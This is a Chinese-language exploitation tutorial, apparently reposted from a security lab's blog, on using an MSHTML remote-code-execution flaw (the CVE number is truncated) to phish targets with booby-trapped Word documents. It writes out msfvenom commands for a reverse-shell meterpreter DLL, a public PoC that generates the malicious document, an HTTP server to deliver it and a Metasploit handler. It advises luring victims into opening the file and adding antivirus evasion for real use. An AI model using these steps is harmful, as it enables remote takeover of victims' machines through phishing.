失眠网,内容丰富有趣,生活中的好帮手!
失眠网 > 利用CVE--40444漏洞钓鱼执法上线MSF

利用CVE--40444漏洞钓鱼执法上线MSF

时间:2023-06-12 04:15:13

相关推荐

利用CVE--40444漏洞钓鱼执法上线MSF

0x01 漏洞描述

9月8日,微软官方发布了关于MSHTML组件的风险通告(漏洞编号:CVE--40444),未经身份验证的攻击者可以利用该漏洞在目标系统上远程执行代码。微软官方表示已经监测到该漏洞存在在野利用。

Microsoft 发现,存在尝试通过特别设计的 Microsoft Office 文档利用此漏洞的针对性攻击。攻击者可制作一个由托管浏览器呈现引擎的 Microsoft Office 文档使用的恶意 ActiveX 控件。然后,攻击者必须诱使用户打开此恶意文件。

0x02 漏洞影响

漏洞编号:CVE--40444

影响版本:Windows Server /R2//R2///等各个主流版本,覆盖面比较广泛,主要用于Office钓鱼。

0x03 测试环境

**攻击机:**kali-linux .1

**靶机:**windows 10(office )

本次漏洞使用lockedbyte师傅的POC,结合kali-linux中metersploit工具

下载地址:

(/lockedbyte/CVE--40444)

0x04 漏洞应用场景

4.1 Kali安装依赖包

sudo apt-get install lcab -y

4.2 生成含有后门的dll

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=本地监听IP lport=本地监听端口 -f dll -o http.dll

下载Poc,进入CVE--40444文件目录下修改exploit.py权限添加写权限,将生成的http.dll程序拷贝到Poc文件夹中并添加写权限。

sudo git clone /lockedbyte/CVE--40444

4.3 利用POC脚本生成含有恶意代码的word文件

sudo python3 exploit.py generate http.dll 本地服务器URL

含有恶意代码的Word文件生成后输出位置在out目录下。

4.4 将含有恶意代码的word文件发送给目标

进入out目录下,启动Python服务器。

python3 -m http.server 80

诱导目标用户点击含有恶意代码的word文件。

4.5 创建监听

msf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcpmsf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcppayload => windows/x64/meterpreter/reverse_tcpmsf6 exploit(multi/handler) > set LHOST 12.12.12.134 //本地监听IPLHOST => 12.12.12.134msf6 exploit(multi/handler) > set LPORT 4444 //本地监听端口LPORT => 4444msf6 exploit(multi/handler) >exploit

4.6 漏洞触发

文件启动时与服务器获取连接。

目标主机成功上线MSF。

0x05 病毒样本分析

5.1 本地杀软病毒样本检测

5.2 在线病毒样本检测

恶意文件执行流程,文件中创建了MSOSYNC.EXE进程,该进程主要收集操作系统硬件相关的指纹信息

(MachineGuid,DigitalProductId,SystemBiosDate)获取系统信息,包含查询计算机时区的功能。

5.3 样本分析详情

解压样本文件

样本文件中的document.xml.rels中存储了指向的恶意html网站链接,浏览器会自动打开网站链接。

该URL下载一个名为word.html,HTML中的JavaScript包含一个指向CAB文件的对象和一个指向INF文件的iframe. CAB文件已打开,INF文件存储在%TEMP%\Low目录中

由于CAB中存在路径遍历(ZipSlip)漏洞,因此可以将INF存储在%TEMP%中,使用“.cpl:”指令打开INF文件,导致通过rundll32侧面加载INF文件。

攻击者通过伪造cab文件内嵌含有载荷的dll文件,借助漏洞使html文件JavaScript加载含有恶意代码的dll,从而远程执行payload。

文中漏洞利用并未进行免杀处理,如在生产环境下利用时,可结合Office宏病毒等免杀系列技巧进行免杀、混淆,从而获取目标控制权限。

参考链接

/s?id=1715778340261801914

/lockedbyte/CVE--40444

.cn/index.php?m=content&c=index&a=show&catid=57&id=488

/qq_4333/article/details/120463783

/cve--40444-exp/

声明

以上内容,均为文章作者原创,由于传播,利用此文所提供的信息而造成的任何直接或间接的后果和损失,均由使用者本人负责,长白山攻防实验室以及文章作者不承担任何责任。

长白山攻防实验室拥有该文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的副本,包括版权声明等全部内容。声明长白山攻防实验室允许,不得任意修改或增减此文章内容,不得以任何方式将其用于商业目的。

如果觉得《利用CVE--40444漏洞钓鱼执法上线MSF》对你有帮助,请点赞、收藏,并留下你的观点哦!

本内容不代表本网观点和政治立场,如有侵犯你的权益请联系我们处理。
网友评论
网友评论仅供其表达个人看法,并不表明网站立场。